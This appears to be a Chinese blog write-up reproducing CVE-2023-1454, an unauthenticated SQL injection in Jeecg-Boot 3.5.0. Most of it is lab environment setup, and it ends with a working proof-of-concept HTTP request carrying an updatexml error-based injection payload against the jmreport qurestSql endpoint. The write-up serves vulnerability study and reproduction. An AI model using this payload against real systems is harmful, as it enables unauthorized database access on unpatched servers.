Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

这篇具有很好参考价值的文章主要介绍了Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

原创文章创作不易,个人博客charis3306.top 


环境搭建

JDK: 1.8+ (小于11)

Maven: 3.5+

MySql: 5.7+

Redis: 3.2 +

Node Js: 10.0 +

Npm: 5.6.0+

Yarn: 1.21.1+

下载源码

后端源码

https://github.com/jeecgboot/jeecg-boot/tree/v3.5.0

前端源码

https://github.com/jeecgboot/jeecgboot-vue3

安装手册

http://doc.jeecg.com/2043871

下载完成后放在bc中。

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

JDK  Maven 用 IDEA解决。

这里我用的是JAVA17,Maven 3.8 别忘了给Maven 换源。

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

数据库使用小P面板。

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

导入数据库

代码

 

 source D:\bc\jeecg-boot\db\jeecgboot-mysql-5.7.sql

 

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

redis安装

https://github.com/MicrosoftArchive/redis/releases

代码

 

powershell

cd "C:\Program Files\Redis"

notepad.exe .\redis.windows.conf

redis-cli

shutdown

exit

redis-server redis.windows.conf

 

 

配置密码

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

配置后端项目:

redis配置

jeecg-boot\jeecg-module-system\jeecg-system-start\src\main\resources\application-dev.yml

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

mysql配置

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

启动后端项目

启动配置如下

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

启动完毕

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

前端安装

Nots js安装

https://www.runoob.com/nodejs/nodejs-install-setup.html

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

安装Yarn

代码

 

npm install yarn -g  //全局安装

yarn --version // 查看版本

配置源

yarn config set registry https://registry.npm.taobao.org -g

yarn config set sass_binary_site https://npm.taobao.org/mirrors/node-sass/ -g

检查源

yarn config get registry // https://registry.npm.taobao.org

yarn config get sass_binary_site // https://npm.taobao.org/mirrors/node-sass/

 

 

检查前端配置

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

配置WebStorm

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

启动前端

右键package.json文件yarn install

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

依赖下载完毕启动

代码

 

 >npm run serve

 

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

漏洞复现:

访问环境

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

该漏洞不需要鉴权可以直接利用。

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

注意这里是前后端分离的,前端为3100后端为8080

poc

代码

 

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1

Host: 192.168.1.3:8080

Content-Length: 131

Content-Type: application/json

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(0x23,(select current_user)),0x23)) or '%%' like '"}

 

 

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)文章来源地址https://www.toymoban.com/news/detail-451705.html

到了这里,关于Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CVE-2023-1454注入分析复现

    简介 JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。 影响版本 Jeecg-Boot= 3.5.1 环境搭建 idea+ 后端源码: https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip 前端源码:

    2024年02月16日
    浏览(26)
  • 通达OA SQL注入漏洞【CVE-2023-4166】

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 通达OA系统,即Offic Anywhere,又称为网络智

    2024年02月13日
    浏览(28)
  • MybatisPlus存在 sql 注入漏洞(CVE-2023-25330)解决办法

    MyBatis-Plus TenantPlugin 是 MyBatis-Plus 的一个为多租户场景而设计的插件,可以在 SQL 中自动添加租户 ID 来实现数据隔离功能。 MyBatis-Plus TenantPlugin 3.5.3.1及之前版本由于 TenantHandler#getTenantId 方法在构造 SQL 表达式时默认情况下未对 tenant(租户)的 ID 值进行过滤,当程序启用了 Te

    2024年02月07日
    浏览(27)
  • MybatisPlus <= 3.5.3.1 TenantPlugin 组件 存在 sql 注入漏洞(CVE-2023-25330)

    MyBatis-Plus TenantPlugin 是 MyBatis-Plus 的一个为多租户场景而设计的插件,可以在 SQL 中自动添加租户 ID 来实现数据隔离功能。 MyBatis-Plus TenantPlugin 3.5.3.1及之前版本由于 TenantHandler#getTenantId 方法在构造 SQL 表达式时默认情况下未对 tenant(租户)的 ID 值进行过滤,当程序启用了 Te

    2024年02月03日
    浏览(35)
  • jeecg-boot批量导入问题注意事项

    由于批量导入数据速度很快, 因为数据库中的create time字段的时间可能一样,并且jeecg框架自带的是根据生成时间排序, 因此在前端翻页查询的时候,数据每次排序可能会不一样, 会出现第一页已经出现过一次的数据在第二页还会出现。 在后端的查询接口中,要在拼接一个

    2024年02月12日
    浏览(36)
  • 基于jeecg-boot的任务甘特图显示

    更多功能看演示系统 gitee源代码地址 后端代码: https://gitee.com/nbacheng/nbcio-boot 前端代码:https://gitee.com/nbacheng/nbcio-vue.git 在线演示(包括H5) : http://122.227.135.243:9888 基于项目的任务显示,最直观的就是甘特图显示,所以今天就说甘特图的显示 经过选择,最终选择dhtmlx-gantt组

    2024年02月16日
    浏览(27)
  • jeecg-boot微服务部署步骤详细说明

    大家好,我是小龙人。 通常小企业是如何成长起来的?接外包,然后将公司慢慢的养起来,最后开始研发自己的产品,产品上线,上市! 哈哈,可能有点理想化了,但是身边好多朋友都自己出去创业了,今儿个张三开了个公司,明儿个李四也注册了个公司,但是了解了下,

    2023年04月09日
    浏览(69)
  • 详解 Jeecg-boot 框架如何配置 elasticsearch

    目录 一、下载安装 Elasticsearch 1、 地址:https://www.elastic.co/cn/downloads/elasticsearch 2、下载完成后,解压缩,进入config目录更改配置文件 3、 修改配置完成后,前往bin目录启动el 4、访问:localhost:9200 测试  二、配置 Jeecg-boot 框架 1、导入jeecg项目后,打开application-dev.yml配置文件,

    2024年01月17日
    浏览(29)
  • Jeecg-Boot 集成Activiti 6 (含源码)

    本项目是2020 年集成的,采用的是当时版本的Jeecg-Boot,集成时请注意版本。 Jeecg-Boot 免费版没有工作流,于是我简单集成了一套,并且运用于公司项目中。 论坛中的Activiti 功能介绍,都来自该代码。 本项目中是多租户模式,如不需要多租户将想要接口中tenantId 赋值删除即可

    2024年02月16日
    浏览(40)
  • 【vue】vue中Mixins的用法(jeecg-boot为例):

    一、jeecg-boot本身只有JeecgListMixin.js Mixin是为将页面的一些 公共方法 放在一起处理(节省重复性代码,方便维护) 优先级: 页面里面的方法 Mixin里面的方法=》所以维护时要注意查找 二、使用Mixin: 注意: 这里import 导入的js文件,要在js文件里面有导出 三、mixins详解: 【1】由

    2024年02月14日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包